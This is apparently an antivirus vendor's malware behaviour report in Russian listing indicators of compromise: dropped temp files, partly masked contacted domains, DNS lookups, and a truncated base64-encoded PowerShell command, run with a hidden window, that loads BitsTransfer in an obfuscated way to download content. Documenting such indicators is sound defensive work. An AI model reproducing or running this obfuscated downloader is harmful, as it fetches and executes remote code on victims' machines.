Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
- %WINDIR%\temp\cabd252.tmp
- %WINDIR%\temp\tard253.tmp
- %WINDIR%\temp\cabd283.tmp
- %WINDIR%\temp\tard284.tmp
- %WINDIR%\temp\cabe8db.tmp
- %WINDIR%\temp\tare8dc.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\cabd252.tmp
- %WINDIR%\temp\tard253.tmp
- %WINDIR%\temp\cabd283.tmp
- %WINDIR%\temp\tard284.tmp
- %WINDIR%\temp\cabe8db.tmp
- %WINDIR%\temp\tare8dc.tmp
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
- 'p3###########.shr.prod.phx3.secureserver.net':80
- 'st####g.icuskin.com':80
- 'ra####kaonline.com':443
- DNS ASK ra####kaonline.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
- DNS ASK p3###########.shr.prod.phx3.secureserver.net
- DNS ASK st####g.icuskin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)